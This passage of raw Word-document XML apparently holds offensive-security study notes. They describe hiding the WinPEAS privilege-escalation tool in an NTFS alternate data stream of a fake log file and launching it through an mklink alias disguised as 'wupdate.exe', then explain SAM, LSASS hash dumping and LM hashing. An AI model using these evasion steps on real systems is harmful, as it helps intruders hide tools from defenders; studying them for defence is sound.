      <w:r w:rsidR="002D35DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> test.txt:secret.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C85F0" w14:textId="77777777" w:rsidR="00F45EDA" w:rsidRDefault="00F45EDA" w:rsidP="00F45EDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA0F209" w14:textId="5FB67EE8" w:rsidR="00F45EDA" w:rsidRDefault="00F45EDA" w:rsidP="00F45EDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WinPeas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737C4443" w14:textId="487FA408" w:rsidR="00F45EDA" w:rsidRDefault="00F45EDA" w:rsidP="00F45EDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>THE Windows priv esc tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3D2FB2" w14:textId="2AE2AD0A" w:rsidR="00F45EDA" w:rsidRDefault="00F45EDA" w:rsidP="00F45EDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Need to hide it to make sure the executable is not detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F1C8A" w14:textId="13A9E71F" w:rsidR="00F45EDA" w:rsidRDefault="0035756C" w:rsidP="00F45EDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>It will essentially enumerate the entire system to scan for vulnerabilities for priv esc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE76AC7" w14:textId="77777777" w:rsidR="0035756C" w:rsidRDefault="0035756C" w:rsidP="0035756C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D83EB75" w14:textId="470B5770" w:rsidR="0035756C" w:rsidRDefault="0035756C" w:rsidP="0035756C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To hide WinPeas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C74C5CE" w14:textId="2B0F65AC" w:rsidR="0035756C" w:rsidRDefault="007217A6" w:rsidP="0035756C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Rename WinPeas to something else, like “payload</w:t>
      </w:r>
      <w:r w:rsidR="009046A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46579C8B" w14:textId="37B4B2B1" w:rsidR="00BD5DEF" w:rsidRDefault="009046A8" w:rsidP="00BD5DEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“type payload.exe &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00BD5DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>windowslog.txt:winpeas.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F3F35" w14:textId="7447C7AD" w:rsidR="00D65BE2" w:rsidRDefault="00D65BE2" w:rsidP="00BD5DEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enter random data into windowslog.txt just so it looks like a regular log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037BD2E7" w14:textId="3032113B" w:rsidR="00D65BE2" w:rsidRDefault="00D65BE2" w:rsidP="00D65BE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Notepad </w:t>
      </w:r>
      <w:r w:rsidR="00540754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>windowslog.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26070185" w14:textId="539508CA" w:rsidR="00540754" w:rsidRDefault="004C0A24" w:rsidP="00540754">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Create a symbolic link</w:t>
      </w:r>
      <w:r w:rsidR="00CE6916">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (might need to be within the system32 dir for this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065258AB" w14:textId="6F930C6C" w:rsidR="004C0A24" w:rsidRDefault="00CE6916" w:rsidP="004C0A24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“mklink wupdate.exe</w:t>
      </w:r>
      <w:r w:rsidR="00EF6EEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\(windowslog.txt</w:t>
      </w:r>
      <w:r w:rsidR="00697355">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A7404D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>winpeas.exe</w:t>
      </w:r>
      <w:r w:rsidR="00EF6EEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> PATH)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17444EBB" w14:textId="56FF18A9" w:rsidR="00913D46" w:rsidRDefault="00913D46" w:rsidP="00913D46">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Don’t need to use “wupdate.exe”, you could use any executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68723477" w14:textId="5331B84C" w:rsidR="00A7404D" w:rsidRDefault="00A7404D" w:rsidP="004C0A24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Every time “wupdate” is entered, winpeas will execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D0BE8" w14:textId="77777777" w:rsidR="00913D46" w:rsidRDefault="00913D46" w:rsidP="00913D46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="562DE97E" w14:textId="77777777" w:rsidR="00913D46" w:rsidRDefault="00913D46" w:rsidP="00913D46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F97C21" w14:textId="3E6F157B" w:rsidR="00913D46" w:rsidRDefault="003D57B9" w:rsidP="00913D46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows Password Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED50D91" w14:textId="5BD7ACB4" w:rsidR="00551B02" w:rsidRDefault="00551B02" w:rsidP="00551B02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Windows OS stores hashed user account passwords locally in the SAM (Security Accounts Manager) database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FE0D2" w14:textId="2258CD40" w:rsidR="00551B02" w:rsidRDefault="00551B02" w:rsidP="00551B02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hashing is the process of converting a piece of data into another value. A hashing function or algorithm is used to generate the new value. The result of a hashing algorithm is known as a hash or hash value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B34A2B" w14:textId="01F978CD" w:rsidR="00551B02" w:rsidRDefault="00CC28A4" w:rsidP="00551B02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Authentication and verification of user credentials is facilitated by the Local Security Authority (LSA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B623D0" w14:textId="6A360C75" w:rsidR="00A6235E" w:rsidRDefault="00A6235E" w:rsidP="00A6235E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>All loops back to the LSASS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB965F" w14:textId="5161DF62" w:rsidR="00CC28A4" w:rsidRDefault="00CC28A4" w:rsidP="00551B02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows versions up to Windows Server 2003 utilize two different types of hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1487CA5C" w14:textId="042442BC" w:rsidR="00CC28A4" w:rsidRDefault="00CC28A4" w:rsidP="00CC28A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0CDE4" w14:textId="5B003B4E" w:rsidR="00CC28A4" w:rsidRDefault="00CC28A4" w:rsidP="00CC28A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r w:rsidR="00DB1889">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> v1 &amp; NTLM v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B0A581" w14:textId="42070848" w:rsidR="00CC28A4" w:rsidRDefault="00A6235E" w:rsidP="00CC28A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows disables LM hashing and utilizes NTLM hashing from Windows Vista onwards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED8614" w14:textId="77777777" w:rsidR="007416FA" w:rsidRDefault="007416FA" w:rsidP="007416FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9D41BE" w14:textId="151C2D58" w:rsidR="007416FA" w:rsidRDefault="007416FA" w:rsidP="007416FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SAM Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D172407" w14:textId="444AD95C" w:rsidR="007416FA" w:rsidRDefault="007416FA" w:rsidP="007416FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SAM is a database file that is responsible for managing user accounts and passwords on Windows. All user account passwords stored in the SAM database are hashed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECD2113" w14:textId="5CA0EC36" w:rsidR="007416FA" w:rsidRDefault="007416FA" w:rsidP="007416FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The SAM database file cannot be copied while the OS is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE3E9D" w14:textId="35BEC98F" w:rsidR="007416FA" w:rsidRDefault="007416FA" w:rsidP="007416FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Windows NT kernel keeps the SAM database file locked and as a result, attackers typically utilize in-memory techniques and tools to dump SAM hashes from the LSASS process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11179608" w14:textId="01BF9DE6" w:rsidR="007416FA" w:rsidRDefault="007416FA" w:rsidP="007416FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In modern versions of Windows, the SAM database is encrypted with a syskey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754FA42E" w14:textId="12722647" w:rsidR="007416FA" w:rsidRDefault="007416FA" w:rsidP="007416FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: Elevated/Administrative privileges are required </w:t>
      </w:r>
      <w:r w:rsidR="00142ED8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> access and interact with the LSASS process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546A3E1" w14:textId="77777777" w:rsidR="00142ED8" w:rsidRDefault="00142ED8" w:rsidP="00142ED8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61713268" w14:textId="57485943" w:rsidR="00142ED8" w:rsidRDefault="00142ED8" w:rsidP="00142ED8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LM (LanMan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DEDE74" w14:textId="4FFBA89E" w:rsidR="00142ED8" w:rsidRDefault="00142ED8" w:rsidP="00142ED8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LM is the default hashing algorithm that was implemented in Windows operating systems prior to NT4.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562304E1" w14:textId="54222A19" w:rsidR="00142ED8" w:rsidRDefault="00142ED8" w:rsidP="00142ED8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The protocol is used to hash user passwords, and the hashing process can be broken down into the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067F4BAF" w14:textId="34E5D42F" w:rsidR="00142ED8" w:rsidRDefault="00142ED8" w:rsidP="00142ED8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The password is broken into two seven-character chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A9F3AD" w14:textId="3FEAF626" w:rsidR="00142ED8" w:rsidRDefault="00142ED8" w:rsidP="00142ED8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>All characters are then converted into uppercase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619FDFFB" w14:textId="26898B90" w:rsidR="00142ED8" w:rsidRDefault="00142ED8" w:rsidP="00142ED8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Each chunk is then hashed separately with the DES algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07967DCF" w14:textId="27F916AB" w:rsidR="00142ED8" w:rsidRDefault="00142ED8" w:rsidP="00142ED8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LM hashing is generally considered to be a weak protocol and can be easily cracked, primarily because the password hash does not include salts, consequently making brute-force and rainbow table attacks effective against LM hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6666C350" w14:textId="77777777" w:rsidR="00017229" w:rsidRDefault="00017229" w:rsidP="00017229">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="392C049E" w14:textId="3FC598B7" w:rsidR="005A3677" w:rsidRDefault="0037153A" w:rsidP="005A3677">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037153A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A8071F5" wp14:editId="53A39DC2">
            <wp:extent cx="5943600" cy="2877185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132218507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5076" name="Picture 1" descr="A diagram of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2877185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C24C4" w14:textId="77777777" w:rsidR="0037153A" w:rsidRDefault="0037153A" w:rsidP="005A3677">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
